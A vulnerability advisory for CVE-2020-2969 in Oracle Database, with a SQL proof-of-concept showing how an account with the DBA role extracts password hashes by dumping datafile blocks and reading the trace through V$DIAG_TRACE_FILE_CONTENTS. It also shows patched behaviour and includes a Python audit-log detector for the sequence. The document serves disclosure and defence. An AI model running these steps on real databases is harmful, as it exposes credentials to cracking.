
Oracle Database Password Hash Unauthorized Access

Posted Jun 11, 2024
Authored by Emad Al-Mousa

Oracle Database versions 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, and 19c allow unauthorized access to password hashes by an account with the DBA role.

tags | exploit, info disclosure
advisories | CVE-2020-2969
SHA-256 | edea13d6bbb4e899e5a14a7b29742067ce892997ff2cae4bac02dd2d1a895ab2

Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role
Product: Database
Manufacturer: Oracle
Affected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Risk Level: Medium
Solution Status: Fixed
CVE Reference: CVE-2020-2969
Base Score: 6.6
Author of Advisory: Emad Al-Mousa


*****************************************
Vulnerability Details:

Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.

The presented scenario illustrates that an account with the “DBA” role can still view/extract the password hashes, even though the account can’t directly query the SYS.USER$ table: as a security enhancement, the “select any dictionary” system privilege no longer provides access to SYS.USER$.

*****************************************
Proof of Concept (PoC):

This simulation was performed in an Oracle Non-CDB environment, and is of course also applicable in a CDB setup.

SQL> create user ninja identified by hello_123;


SQL> grant create session to ninja;


SQL> grant dba to ninja;


SQL> alter user ninja default role all;


*** When attempting to select from SYS.USER$, the account is refused, because the system privilege “SELECT ANY DICTIONARY” was changed to restrict direct access to multiple SYS tables such as USER$, ENC$, DEFAULT_PWD$, LINK$, USER_HISTORY$ and CDB_LOCAL_ADMINAUTH$:

SQL> select * from sys.user$;
select * from sys.user$
*
ERROR at line 1:
ORA-01031: insufficient privileges

** I will perform a dump of the system data file to gain access to the hashed passwords:

SQL> alter system dump datafile 1 block min 210 block max 215;

** Then immediately I will check the generated trace file name using the query:

SQL> select * from v$diag_info where NAME='Default Trace File';

** I will query the “payload” column of the view V$DIAG_TRACE_FILE, which will read the contents of the generated trace file:

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';

// The password hash will be exposed in the trace file!

After applying the Oracle July 2020 CPU patches, re-run the simulation:

SQL> create user ninja identified by hello_123;


SQL> grant create session to ninja;


SQL> grant dba to ninja;


SQL> alter user ninja default role all;


SQL> show user
USER is "NINJA"

SQL> select * from sys.user$;
select * from sys.user$
*
ERROR at line 1:
ORA-01031: insufficient privileges


SQL> alter system dump datafile 1 block min 210 block max 215;
alter system dump datafile 1 block min 210 block max 215
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> select * from v$diag_info where NAME='Default Trace File';

INST_ID NAME
---------- ----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
CON_ID
----------
1 Default Trace File
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171
16.trc


SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';

PAYLOAD
--------------------------------------------------------------------------------
Trace file
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171
16.trc

Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.8.0.0.0
Build label: RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702
ORACLE_HOME: /oraclex/oradbp05/product/19.3
System name: Linux
Node name: boba
Release: 3.10.0-1127.13.1.el7.x86_64
Version: #1 SMP Fri Jun 12 14:34:17 EDT 2020

PAYLOAD
--------------------------------------------------------------------------------
Machine: x86_64
Instance name: ora5
Redo thread mounted by this instance: 1
Oracle process number: 69
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)


*** 2020-07-16T11:09:31.240875+03:00

*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00

PAYLOAD
--------------------------------------------------------------------------------
*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00
*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00
*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00

Error: file 1 can only be dumped with SYSDBA privillege
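
The following Python is an added example, not code from the advisory or from Oracle: it flags the PoC's sequence (a datafile dump followed by a read of V$DIAG_TRACE_FILE_CONTENTS in the same session) in audit rows. The row layout, the sample rows, the 30-minute window and the use of the SYS user name as a stand-in for SYSDBA are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample audit rows: (ISO timestamp, DB user, session id, SQL text).
SAMPLE_AUDIT = [
    ("2020-07-16T11:09:31", "ninja", 1174,
     "alter system dump datafile 1 block min 210 block max 215"),
    ("2020-07-16T11:09:40", "ninja", 1174,
     "select * from v$diag_info where NAME='Default Trace File'"),
    ("2020-07-16T11:09:55", "ninja", 1174,
     "select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='a.trc'"),
    ("2020-07-16T12:00:00", "APPUSER", 2201,
     "select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='b.trc'"),
    ("2020-07-16T12:30:00", "SYS", 15, "ALTER SYSTEM DUMP DATAFILE 1 BLOCK 100"),
    ("2020-07-16T13:00:00", "OPS", 3300, "alter system  dump\n datafile 4 block 12"),
    ("2020-07-16T15:00:00", "OPS", 3300,
     "select payload from v$diag_trace_file_contents"),
]

DUMP_RE = re.compile(r"\balter\s+system\s+dump\s+datafile\s+(\d+)", re.I)
TRACE_READ_RE = re.compile(r"\bv\$diag_trace_file_contents\b", re.I)

def find_dump_chains(rows, window=timedelta(minutes=30), allow=frozenset({"SYS"})):
    """One finding per datafile dump by a user outside `allow`.

    Severity is "high" when the same session reads V$DIAG_TRACE_FILE_CONTENTS
    within `window` after the dump, otherwise "medium".
    """
    findings = []
    by_session = {}  # (user, session id) -> findings for that session
    for ts, user, sid, sql in sorted(rows, key=lambda r: r[0]):
        when = datetime.fromisoformat(ts)
        key = (user.upper(), sid)
        dump = DUMP_RE.search(sql)
        if dump:
            if key[0] in allow:  # assumption: user name stands in for SYSDBA
                continue
            hit = {"user": key[0], "session": sid, "file": int(dump.group(1)),
                   "dump_at": when, "severity": "medium"}
            findings.append(hit)
            by_session.setdefault(key, []).append(hit)
        elif TRACE_READ_RE.search(sql):
            for hit in by_session.get(key, []):
                if when - hit["dump_at"] <= window:
                    hit["severity"] = "high"
    return findings

if __name__ == "__main__":
    for f in find_dump_chains(SAMPLE_AUDIT):
        print(f["severity"], f["user"], "session", f["session"], "datafile", f["file"])
```

A trace read with no preceding dump in the same session (APPUSER above) produces no finding, and a read outside the window (OPS above) leaves the dump at "medium".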



*****************************************
References:
https://www.oracle.com/security-alerts/cpujul2020.html
https://www.oracle.com/security-alerts/cpujul2020verbose.html
https://nvd.nist.gov/vuln/detail/CVE-2020-2969
https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/


